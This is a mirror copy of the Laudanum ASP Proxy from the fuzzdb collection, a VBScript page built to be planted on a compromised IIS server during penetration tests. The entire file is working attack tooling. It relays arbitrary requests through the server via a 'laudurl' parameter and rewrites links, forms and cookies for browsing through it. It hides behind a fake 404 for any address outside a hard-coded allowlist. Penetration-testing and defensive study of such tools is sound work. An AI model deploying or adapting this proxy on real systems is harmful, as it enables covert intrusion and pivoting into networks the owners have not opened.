mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 19:13:09 +00:00
455 lines
13 KiB
Text
455 lines
13 KiB
Text
|
<%@Language="VBScript"%>
|
||
|
<%Option Explicit%>
|
||
|
<%Response.Buffer = True%>
|
||
|
<%
|
||
|
' *******************************************************************************
|
||
|
' ***
|
||
|
' *** Laudanum Project
|
||
|
' *** A Collection of Injectable Files used during a Penetration Test
|
||
|
' ***
|
||
|
' *** More information is available at:
|
||
|
' *** http://laudanum.secureideas.net
|
||
|
' *** laudanum@secureideas.net
|
||
|
' ***
|
||
|
' *** Project Leads:
|
||
|
' *** Kevin Johnson <kjohnson@secureideas.net
|
||
|
' *** Tim Medin <tim@counterhack.com>
|
||
|
' ***
|
||
|
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||
|
' ***
|
||
|
' ********************************************************************************
|
||
|
' ***
|
||
|
' *** This file provides access as a proxy.
|
||
|
' *** Written by Tim Medin <tim@counterhack.com>
|
||
|
' ***
|
||
|
' ********************************************************************************
|
||
|
' *** This program is free software; you can redistribute it and/or
|
||
|
' *** modify it under the terms of the GNU General Public License
|
||
|
' *** as published by the Free Software Foundation; either version 2
|
||
|
' *** of the License, or (at your option) any later version.
|
||
|
' ***
|
||
|
' *** This program is distributed in the hope that it will be useful,
|
||
|
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
|
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||
|
' *** GNU General Public License for more details.
|
||
|
' ***
|
||
|
' *** You can get a copy of the GNU General Public License from this
|
||
|
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||
|
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||
|
' *** Place - Suite Boston, MA USA.
|
||
|
' ***
|
||
|
' ***************************************************************************** */
|
||
|
|
||
|
' ***************** Config entries below ***********************
|
||
|
|
||
|
' Define variables
|
||
|
Dim allowedIPs
|
||
|
Dim allowed
|
||
|
Dim i
|
||
|
Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
|
||
|
Dim urltemp
|
||
|
Dim urlscheme
|
||
|
Dim urlhost
|
||
|
Dim urlport
|
||
|
Dim urlpath
|
||
|
Dim urlfile
|
||
|
Dim urlquery
|
||
|
Dim http
|
||
|
Dim method
|
||
|
Dim contenttype
|
||
|
Dim stream
|
||
|
Dim regex
|
||
|
Dim body
|
||
|
Dim params
|
||
|
|
||
|
function err_handler()
|
||
|
%>
|
||
|
<html>
|
||
|
<head>
|
||
|
<title>Laudanum ASP Proxy</title>
|
||
|
</head>
|
||
|
<body>
|
||
|
<h1>Fatal Error!</h1>
|
||
|
<%=Err.Number%><br/>
|
||
|
<%=Err.Message%><br/>
|
||
|
<hr/>
|
||
|
<address>
|
||
|
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||
|
Written by Tim Medin.<br/>
|
||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||
|
</address>
|
||
|
</body>
|
||
|
</html><%
|
||
|
end function
|
||
|
|
||
|
function CleanQueryString
|
||
|
' removes laudurl from the querystring
|
||
|
Dim i
|
||
|
Dim j
|
||
|
Dim s
|
||
|
Dim key
|
||
|
Dim q
|
||
|
|
||
|
|
||
|
if len(request.querystring) = 0 then
|
||
|
CleanQueryString = ""
|
||
|
exit function
|
||
|
end if
|
||
|
|
||
|
' build the request parameters
|
||
|
for i = 1 to request.querystring.count
|
||
|
key = request.querystring.key(i)
|
||
|
'response.write "<br/>key:" & key
|
||
|
if key = "laudurl" then
|
||
|
' if the key is laudurl, we need check if there is a ? in the string since
|
||
|
' it may have its own query string that doesn't get parsed properly.
|
||
|
s = split(request.querystring("laudurl"), "?")
|
||
|
if ubound(s) > lbound(s) then
|
||
|
' laudurl contains a ?, it must be manually parsed
|
||
|
key = left(s(1), instr(s(1), "=") - 1)
|
||
|
q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
|
||
|
end if
|
||
|
else
|
||
|
for j = 1 to request.querystring(key).count
|
||
|
'response.write "<br/> -value:" & request.querystring(key)(j)
|
||
|
q = q & "&" & key & "=" & request.querystring(key)(j)
|
||
|
next
|
||
|
end if
|
||
|
next
|
||
|
|
||
|
if len(q) > 0 then
|
||
|
CleanQueryString = "?" & mid(q, 2)
|
||
|
else
|
||
|
CleanQueryString = ""
|
||
|
end if
|
||
|
end function
|
||
|
|
||
|
function CleanFormValues()
|
||
|
Dim r
|
||
|
Set r = New RegExp
|
||
|
r.IgnoreCase = true
|
||
|
r.Global = true
|
||
|
|
||
|
' remove the laudurl paramater
|
||
|
r.Pattern = "laudurl=[^&]+($|&)"
|
||
|
CleanFormValues = r.Replace(request.form, "")
|
||
|
Set r = nothing
|
||
|
end function
|
||
|
|
||
|
sub ParseUrl()
|
||
|
' parses the url into the global variables
|
||
|
Dim urltemp
|
||
|
Dim url
|
||
|
|
||
|
'get the url, it may be in the querystring for a get or from a form in a post
|
||
|
url = Request.QueryString("laudurl")
|
||
|
if url = "" then
|
||
|
url = Request.Form("laudurl")
|
||
|
end if
|
||
|
|
||
|
if url = "" then
|
||
|
urlscheme = ""
|
||
|
urlhost = ""
|
||
|
urlport = ""
|
||
|
urlpath = ""
|
||
|
urlfile = ""
|
||
|
urlquery = ""
|
||
|
exit sub
|
||
|
end if
|
||
|
|
||
|
' Parse the url and break it into its components
|
||
|
' this is done so it can be used to rewrite the page
|
||
|
|
||
|
' ensure the url has a scheme, if it doesn't then assume http
|
||
|
if instr(url,"://") = 0 then url = "http://" + url
|
||
|
|
||
|
' Get the scheme
|
||
|
urlscheme = split(url, "://")(0) & "://"
|
||
|
|
||
|
' urltemp is used to hold the remainder of the url as each portion is parsed
|
||
|
urltemp = mid(url, len(urlscheme) + 1)
|
||
|
'get the host
|
||
|
if instr(urltemp, "/") = 0 then
|
||
|
' there is no path so all that is left is the host
|
||
|
urlhost = urltemp
|
||
|
urlport = ""
|
||
|
urlpath = "/"
|
||
|
urlfile = ""
|
||
|
urlport = ""
|
||
|
else
|
||
|
' there is more that just the hostname remaining
|
||
|
urlhost = left(urltemp, instr(urltemp, "/") - 1)
|
||
|
urltemp = mid(urltemp, len(urlhost) + 1)
|
||
|
|
||
|
' is there a port
|
||
|
if instr(urlhost, ":") = 0 then
|
||
|
' no port
|
||
|
urlport = ""
|
||
|
else
|
||
|
' there is a port
|
||
|
arr = split(urlhost, ":")
|
||
|
urlhost = arr(0)
|
||
|
urlport = ":" & arr(1)
|
||
|
end if
|
||
|
|
||
|
' all that is left is the path and the query
|
||
|
' is there a query?
|
||
|
if instr(urltemp, "?") = 0 then
|
||
|
' no query
|
||
|
urlpath = urltemp
|
||
|
'urlquery = ""
|
||
|
else
|
||
|
'Response.Write "<br><br>" & urltemp & "<br><br>"
|
||
|
urlpath = left(urltemp, instr(urltemp, "?") - 1)
|
||
|
'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
|
||
|
end if
|
||
|
|
||
|
if right(urlpath, 1) = "/" then
|
||
|
urlfile = ""
|
||
|
else
|
||
|
' we need to get the path and the file
|
||
|
urltemp = split(urlpath, "/")
|
||
|
urlfile = urltemp(ubound(urltemp))
|
||
|
urlpath = left(urlpath, len(urlpath) - len(urlfile))
|
||
|
end if
|
||
|
end if
|
||
|
|
||
|
urlquery = CleanQueryString
|
||
|
|
||
|
'response.write "<br>scheme: " & urlscheme
|
||
|
'response.write "<br>host: " & urlhost
|
||
|
'response.write "<br>port: " & urlport
|
||
|
'response.write "<br>path: " & urlpath
|
||
|
'response.write "<br>file: " & urlfile
|
||
|
'response.write "<br>query: " & urlquery
|
||
|
'response.write "<br>full: " & FullUrl()
|
||
|
'response.end
|
||
|
end sub
|
||
|
|
||
|
function FullUrl()
|
||
|
FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
|
||
|
end function
|
||
|
|
||
|
sub RewriteHeaders()
|
||
|
Dim i
|
||
|
Dim header
|
||
|
Dim headervalue
|
||
|
Dim regexdomain
|
||
|
Dim regexpath
|
||
|
|
||
|
' setup a regular expression to clean the cookie's domain and path
|
||
|
Set regexdomain = New RegExp
|
||
|
regexdomain.IgnoreCase = true
|
||
|
regexdomain.Global = true
|
||
|
' rewrite images and links - absolute reference
|
||
|
regexdomain.Pattern = "domain=[\S]+"
|
||
|
|
||
|
Set regexpath = New RegExp
|
||
|
regexpath.IgnoreCase = true
|
||
|
regexpath.Global = true
|
||
|
' rewrite images and links - absolute reference
|
||
|
regexpath.Pattern = "path=[\S]+"
|
||
|
|
||
|
' go through each header
|
||
|
for each i in Split(http.getAllResponseHeaders, vbLf)
|
||
|
' Break on the \x0a and remove the \x0d if it exists
|
||
|
i = Replace(i, vbCr, "")
|
||
|
' make sure it is a header and value
|
||
|
if instr(i, ":") > 0 then
|
||
|
' break the response headers into header and value
|
||
|
header = trim(Left(i, instr(i, ":") - 1))
|
||
|
header = replace(header, "_", "-")
|
||
|
headervalue = trim(Right(i, len(i) - instr(i, ":")))
|
||
|
|
||
|
' don't add these two header types since they are handled automatically
|
||
|
if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
|
||
|
if lcase(header) = "set-cookie" then
|
||
|
' strip the domain from the cookie
|
||
|
headervalue = regexdomain.replace(headervalue, "")
|
||
|
' strip the path from the cookie
|
||
|
headervalue = regexpath.replace(headervalue, "")
|
||
|
headervalue = trim(headervalue)
|
||
|
end if
|
||
|
response.AddHeader header, headervalue
|
||
|
end if
|
||
|
end if
|
||
|
next
|
||
|
|
||
|
Set regexdomain = nothing
|
||
|
Set regexpath = nothing
|
||
|
end sub
|
||
|
|
||
|
' TODO: Add authentication support so it will work behind a proxy
|
||
|
' IPs are enterable as individual addresses TODO: add CIDR support
|
||
|
allowedIPs = "192.168.0.1,127.0.0.1,::1"
|
||
|
' Just in cace you added a space in the line above
|
||
|
allowedIPs = replace(allowedIPS," ","")
|
||
|
'turn it into an array
|
||
|
allowedIPs = split(allowedIPS,",") '
|
||
|
' make sure the ip is allowed
|
||
|
' TODO: change this to 0 for production, it is 1 for testing
|
||
|
allowed = 0
|
||
|
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||
|
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||
|
allowed = 1
|
||
|
exit for
|
||
|
end if
|
||
|
next
|
||
|
' send a 404 if the IP Address is not allowed
|
||
|
if allowed = 0 then
|
||
|
Response.Status = "404 File Not Found"
|
||
|
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||
|
Response.End
|
||
|
end if
|
||
|
|
||
|
|
||
|
'initialize variables
|
||
|
Set http = nothing
|
||
|
Set regex = nothing
|
||
|
Set stream = nothing
|
||
|
|
||
|
' Define Constants
|
||
|
const useMSXML2 = 0
|
||
|
const chunkSize = 1048576 ' 1MB
|
||
|
|
||
|
' parse the url into its parts
|
||
|
ParseUrl()
|
||
|
|
||
|
' check if there is a valid url
|
||
|
if len(FullUrl) = 0 then
|
||
|
' no url to proxy, give `em the boring default page
|
||
|
|
||
|
' Default layout of the page
|
||
|
' First thing you get when you hit the page without giving it a URL
|
||
|
%>
|
||
|
<html>
|
||
|
<head>
|
||
|
<title>Laudanum ASP Proxy</title>
|
||
|
<script type="text/javascript">
|
||
|
function init() {
|
||
|
document.proxy.url.focus();
|
||
|
}
|
||
|
</script>
|
||
|
</head>
|
||
|
<body onload="init()">
|
||
|
|
||
|
<h1>Laudanum ASP Proxy</h1>
|
||
|
|
||
|
<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
|
||
|
<input type="text" name="laudurl" size="70">
|
||
|
<input type="submit" value="Submit">
|
||
|
</form>
|
||
|
<hr/>
|
||
|
<address>
|
||
|
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||
|
Written by Tim Medin.<br/>
|
||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||
|
</address>
|
||
|
</body>
|
||
|
</html> <%
|
||
|
|
||
|
Response.End()
|
||
|
end if
|
||
|
|
||
|
' Let's get our Proxy on!!!
|
||
|
' define the request type
|
||
|
if useMSXML2 = 1 then
|
||
|
Set http = Server.CreateObject("MSXML2.XMLHTTP")
|
||
|
else
|
||
|
Set http = Server.CreateObject("Microsoft.XMLHTTP")
|
||
|
end if
|
||
|
|
||
|
' get the request type
|
||
|
method = Request.ServerVariables("REQUEST_METHOD")
|
||
|
|
||
|
' setup the request, false means don't send it yet
|
||
|
http.Open method, FullUrl, False
|
||
|
|
||
|
' send the request
|
||
|
if method = "POST" then
|
||
|
params = CleanFormValues
|
||
|
http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
|
||
|
http.setRequestHeader "Content-length", len(params)
|
||
|
http.setRequestHeader "Connection", "close"
|
||
|
http.Send(params)
|
||
|
else
|
||
|
http.Send
|
||
|
end if
|
||
|
|
||
|
' Replace the normal headers with the ones from the response
|
||
|
Response.Clear
|
||
|
contenttype = http.getResponseHeader("Content-Type")
|
||
|
Response.ContentType = contenttype
|
||
|
|
||
|
' rewrite the headers. Takes headers and passes them to new request
|
||
|
RewriteHeaders()
|
||
|
|
||
|
' how to respond? is it text or is it something else?
|
||
|
if lcase(left(contenttype, 4)) = "text" then
|
||
|
' response is text, so we need to rewrite it, but that's later
|
||
|
|
||
|
|
||
|
' do the rewriting
|
||
|
body = http.responseText
|
||
|
|
||
|
Set regex = New RegExp
|
||
|
regex.IgnoreCase = true
|
||
|
regex.Global = true
|
||
|
|
||
|
' rewrite images and links - absolute reference
|
||
|
s = urlscheme & urlhost & urlport
|
||
|
regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
|
||
|
|
||
|
' rewrite images and links - full reference
|
||
|
regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3")
|
||
|
|
||
|
' rewrite images and links - absolute reference
|
||
|
s = urlscheme & urlhost & urlport & urlpath
|
||
|
regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
|
||
|
|
||
|
|
||
|
' rewrite forms - absolute reference
|
||
|
s = urlscheme & urlhost & urlport
|
||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
|
||
|
|
||
|
' rewrite forms - full reference
|
||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">")
|
||
|
|
||
|
' rewrite forms - absolute reference
|
||
|
s = urlscheme & urlhost & urlport & urlpath
|
||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
|
||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
|
||
|
|
||
|
Response.Write(body)
|
||
|
|
||
|
Set regex = nothing
|
||
|
else
|
||
|
' some sort of binary response, so stream it
|
||
|
Set stream = nothing
|
||
|
Set stream = Server.CreateObject("ADODB.Stream")
|
||
|
stream.Type = 1 'Binary
|
||
|
stream.Open
|
||
|
stream.Write http.responseBody
|
||
|
stream.Position = 0
|
||
|
|
||
|
For i = 0 to stream.Size \ chunkSize
|
||
|
Response.BinaryWrite(stream.Read(chunkSize))
|
||
|
next
|
||
|
Set stream = nothing
|
||
|
end if
|
||
|
|
||
|
Set http = nothing
|
||
|
|
||
|
Response.End
|
||
|
|
||
|
:HandleError
|
||
|
err_handler
|
||
|
|
||
|
%>
|
||
|
|